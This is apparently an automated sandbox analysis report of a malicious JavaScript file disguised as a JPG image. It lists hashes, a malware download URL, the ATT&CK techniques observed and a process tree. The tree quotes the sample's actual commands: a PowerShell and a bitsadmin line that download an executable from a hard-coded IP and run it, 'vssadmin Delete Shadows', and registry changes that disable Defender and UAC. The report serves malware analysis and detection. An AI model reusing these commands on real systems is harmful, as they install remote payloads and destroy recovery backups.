Analysis
-
max time kernel
125s -
max time network
126s -
platform
windows10_x64 -
resource
win10v200430 -
submitted
08-07-2020 01:25
Static task
static1
Behavioral task
behavioral1
Sample
PIC180168.jpg.js
Resource
win7
Behavioral task
behavioral2
Sample
PIC180168.jpg.js
Resource
win10v200430
General
-
Target
PIC180168.jpg.js
-
Size
253KB
-
MD5
2c0a6e6f385e471bdb870a723e33cc4d
-
SHA1
07415191a13e6943eb2e0f41bdf6cf7acfa70156
-
SHA256
6389e3c49b6f4009ca0f1631436d481065a3b3cfab7a15a073edbb61dd971c73
-
SHA512
39ca7bbd702a4aede2f57406d57cf1e7a05128e2723372fe084e7db9bf69594fe904cfd5d6f6a92d4b95fda9edd575d10977a9f8b52ae526fbf19fc204746048
Malware Config
Extracted
http://217.8.117.63/tspm.exe
Signatures
-
Download via BitsAdmin 1 TTPs 1 IoCs
-
Processes:
taskhostw.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" taskhostw.exe -
Processes:
2537425072.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2537425072.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" 2537425072.exe -
Suspicious use of WriteProcessMemory 35 IoCs
Processes:
wscript.execmd.execmd.exepowershell.exe8468468468.exetaskhostw.exe2537425072.exedescription pid process target process PID 504 wrote to memory of 808 504 wscript.exe cmd.exe PID 504 wrote to memory of 808 504 wscript.exe cmd.exe PID 504 wrote to memory of 1000 504 wscript.exe cmd.exe PID 504 wrote to memory of 1000 504 wscript.exe cmd.exe PID 808 wrote to memory of 1184 808 cmd.exe powershell.exe PID 808 wrote to memory of 1184 808 cmd.exe powershell.exe PID 1000 wrote to memory of 1288 1000 cmd.exe bitsadmin.exe PID 1000 wrote to memory of 1288 1000 cmd.exe bitsadmin.exe PID 1184 wrote to memory of 2672 1184 powershell.exe 8468468468.exe PID 1184 wrote to memory of 2672 1184 powershell.exe 8468468468.exe PID 1184 wrote to memory of 2672 1184 powershell.exe 8468468468.exe PID 2672 wrote to memory of 4032 2672 8468468468.exe taskhostw.exe PID 2672 wrote to memory of 4032 2672 8468468468.exe taskhostw.exe PID 2672 wrote to memory of 4032 2672 8468468468.exe taskhostw.exe PID 4032 wrote to memory of 3664 4032 taskhostw.exe 2537425072.exe PID 4032 wrote to memory of 3664 4032 taskhostw.exe 2537425072.exe PID 4032 wrote to memory of 3664 4032 taskhostw.exe 2537425072.exe PID 3664 wrote to memory of 736 3664 2537425072.exe wmic.exe PID 3664 wrote to memory of 736 3664 2537425072.exe wmic.exe PID 3664 wrote to memory of 736 3664 2537425072.exe wmic.exe PID 3664 wrote to memory of 2884 3664 2537425072.exe vssadmin.exe PID 3664 wrote to memory of 2884 3664 2537425072.exe vssadmin.exe PID 3664 wrote to memory of 2884 3664 2537425072.exe vssadmin.exe PID 3664 wrote to memory of 1336 3664 2537425072.exe wmic.exe PID 3664 wrote to memory of 1336 3664 2537425072.exe wmic.exe PID 3664 wrote to memory of 1336 3664 2537425072.exe wmic.exe PID 3664 wrote to memory of 2300 3664 2537425072.exe vssadmin.exe PID 3664 wrote to memory of 2300 3664 2537425072.exe vssadmin.exe PID 3664 wrote to memory of 2300 3664 2537425072.exe vssadmin.exe PID 3664 wrote to memory of 3824 3664 2537425072.exe wmic.exe PID 3664 wrote to memory of 3824 3664 2537425072.exe wmic.exe PID 3664 wrote to memory of 3824 3664 2537425072.exe wmic.exe PID 3664 wrote to memory of 3564 3664 2537425072.exe vssadmin.exe PID 3664 wrote to memory of 3564 3664 2537425072.exe vssadmin.exe PID 3664 wrote to memory of 3564 3664 2537425072.exe vssadmin.exe -
Suspicious use of AdjustPrivilegeToken 67 IoCs
Processes:
powershell.exewmic.exevssvc.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 1184 powershell.exe Token: SeIncreaseQuotaPrivilege 736 wmic.exe Token: SeSecurityPrivilege 736 wmic.exe Token: SeTakeOwnershipPrivilege 736 wmic.exe Token: SeLoadDriverPrivilege 736 wmic.exe Token: SeSystemProfilePrivilege 736 wmic.exe Token: SeSystemtimePrivilege 736 wmic.exe Token: SeProfSingleProcessPrivilege 736 wmic.exe Token: SeIncBasePriorityPrivilege 736 wmic.exe Token: SeCreatePagefilePrivilege 736 wmic.exe Token: SeBackupPrivilege 736 wmic.exe Token: SeRestorePrivilege 736 wmic.exe Token: SeShutdownPrivilege 736 wmic.exe Token: SeDebugPrivilege 736 wmic.exe Token: SeSystemEnvironmentPrivilege 736 wmic.exe Token: SeRemoteShutdownPrivilege 736 wmic.exe Token: SeUndockPrivilege 736 wmic.exe Token: SeManageVolumePrivilege 736 wmic.exe Token: 33 736 wmic.exe Token: 34 736 wmic.exe Token: 35 736 wmic.exe Token: 36 736 wmic.exe Token: SeBackupPrivilege 1016 vssvc.exe Token: SeRestorePrivilege 1016 vssvc.exe Token: SeAuditPrivilege 1016 vssvc.exe Token: SeIncreaseQuotaPrivilege 1336 wmic.exe Token: SeSecurityPrivilege 1336 wmic.exe Token: SeTakeOwnershipPrivilege 1336 wmic.exe Token: SeLoadDriverPrivilege 1336 wmic.exe Token: SeSystemProfilePrivilege 1336 wmic.exe Token: SeSystemtimePrivilege 1336 wmic.exe Token: SeProfSingleProcessPrivilege 1336 wmic.exe Token: SeIncBasePriorityPrivilege 1336 wmic.exe Token: SeCreatePagefilePrivilege 1336 wmic.exe Token: SeBackupPrivilege 1336 wmic.exe Token: SeRestorePrivilege 1336 wmic.exe Token: SeShutdownPrivilege 1336 wmic.exe Token: SeDebugPrivilege 1336 wmic.exe Token: SeSystemEnvironmentPrivilege 1336 wmic.exe Token: SeRemoteShutdownPrivilege 1336 wmic.exe Token: SeUndockPrivilege 1336 wmic.exe Token: SeManageVolumePrivilege 1336 wmic.exe Token: 33 1336 wmic.exe Token: 34 1336 wmic.exe Token: 35 1336 wmic.exe Token: 36 1336 wmic.exe Token: SeIncreaseQuotaPrivilege 3824 wmic.exe Token: SeSecurityPrivilege 3824 wmic.exe Token: SeTakeOwnershipPrivilege 3824 wmic.exe Token: SeLoadDriverPrivilege 3824 wmic.exe Token: SeSystemProfilePrivilege 3824 wmic.exe Token: SeSystemtimePrivilege 3824 wmic.exe Token: SeProfSingleProcessPrivilege 3824 wmic.exe Token: SeIncBasePriorityPrivilege 3824 wmic.exe Token: SeCreatePagefilePrivilege 3824 wmic.exe Token: SeBackupPrivilege 3824 wmic.exe Token: SeRestorePrivilege 3824 wmic.exe Token: SeShutdownPrivilege 3824 wmic.exe Token: SeDebugPrivilege 3824 wmic.exe Token: SeSystemEnvironmentPrivilege 3824 wmic.exe Token: SeRemoteShutdownPrivilege 3824 wmic.exe Token: SeUndockPrivilege 3824 wmic.exe Token: SeManageVolumePrivilege 3824 wmic.exe Token: 33 3824 wmic.exe -
Blacklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 1 1184 powershell.exe -
Processes:
taskhostw.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusOverride = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesOverride = "1" taskhostw.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallOverride = "1" taskhostw.exe -
Processes:
2537425072.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 2537425072.exe -
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
8468468468.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Tasks = "C:\\Windows\\265618363602\\taskhostw.exe" 8468468468.exe Set value (str) \REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\Host Process for Windows Tasks = "C:\\Windows\\265618363602\\taskhostw.exe" 8468468468.exe -
Enumerates connected drives 3 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Drops file in Windows directory 3 IoCs
Processes:
8468468468.exedescription ioc process File created C:\Windows\265618363602\taskhostw.exe 8468468468.exe File opened for modification C:\Windows\265618363602\taskhostw.exe 8468468468.exe File opened for modification C:\Windows\265618363602 8468468468.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Suspicious behavior: EnumeratesProcesses 613 IoCs
Processes:
powershell.exe2537425072.exepid process 1184 powershell.exe 1184 powershell.exe 1184 powershell.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe 3664 2537425072.exe -
System policy modification 1 TTPs 1 IoCs
Processes:
2537425072.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 2537425072.exe -
Executes dropped EXE 3 IoCs
Processes:
8468468468.exetaskhostw.exe2537425072.exepid process 2672 8468468468.exe 4032 taskhostw.exe 3664 2537425072.exe -
Processes:
taskhostw.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AutoUpdateDisableNotify = "1" taskhostw.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
2537425072.exedescription ioc process File opened for modification \??\Z:\$RECYCLE.BIN\S-1-5-21-1231583446-2617009595-2137880041-1000\desktop.ini 2537425072.exe -
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 11 api.myip.com 13 api.myip.com -
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exevssadmin.exevssadmin.exepid process 2884 vssadmin.exe 2300 vssadmin.exe 3564 vssadmin.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\PIC180168.jpg.js1⤵
- Suspicious use of WriteProcessMemory
PID:504 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c PowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspm.exe','C:\Users\Admin\AppData\Local\Temp\8468468468.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\8468468468.exe'2⤵
- Suspicious use of WriteProcessMemory
PID:808 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClient).DownloadFile('http://217.8.117.63/tspm.exe','C:\Users\Admin\AppData\Local\Temp\8468468468.exe');Start-Process 'C:\Users\Admin\AppData\Local\Temp\8468468468.exe'3⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Blacklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
PID:1184 -
C:\Users\Admin\AppData\Local\Temp\8468468468.exe"C:\Users\Admin\AppData\Local\Temp\8468468468.exe"4⤵
- Suspicious use of WriteProcessMemory
- Adds Run entry to start application
- Drops file in Windows directory
- Executes dropped EXE
PID:2672 -
C:\Windows\265618363602\taskhostw.exeC:\Windows\265618363602\taskhostw.exe5⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of WriteProcessMemory
- Windows security bypass
- Executes dropped EXE
- Windows security modification
PID:4032 -
C:\Users\Admin\AppData\Local\Temp\2537425072.exeC:\Users\Admin\AppData\Local\Temp\2537425072.exe6⤵
- UAC bypass
- Suspicious use of WriteProcessMemory
- Checks whether UAC is enabled
- Suspicious behavior: EnumeratesProcesses
- System policy modification
- Executes dropped EXE
- Drops desktop.ini file(s)
PID:3664 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive7⤵
- Suspicious use of AdjustPrivilegeToken
PID:736 -
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet7⤵
- Interacts with shadow copies
PID:2884 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive7⤵
- Suspicious use of AdjustPrivilegeToken
PID:1336 -
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet7⤵
- Interacts with shadow copies
PID:2300 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive7⤵
- Suspicious use of AdjustPrivilegeToken
PID:3824 -
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe Delete Shadows /All /Quiet7⤵
- Interacts with shadow copies
PID:3564 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bitsadmin /transfer 4g44h4wh4hwdw /download /priority high http://217.8.117.63/tspm.exe C:\Users\Admin\AppData\Local\Temp\24624627.exe&start C:\Users\Admin\AppData\Local\Temp\24624627.exe2⤵
- Suspicious use of WriteProcessMemory
PID:1000 -
C:\Windows\system32\bitsadmin.exebitsadmin /transfer 4g44h4wh4hwdw /download /priority high http://217.8.117.63/tspm.exe C:\Users\Admin\AppData\Local\Temp\24624627.exe3⤵
- Download via BitsAdmin
PID:1288
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:1016
Network
MITRE ATT&CK Enterprise v6
Persistence
BITS Jobs
1Modify Existing Service
2Registry Run Keys / Startup Folder
1Defense Evasion
BITS Jobs
1Bypass User Account Control
1Disabling Security Tools
4File Deletion
2Modify Registry
7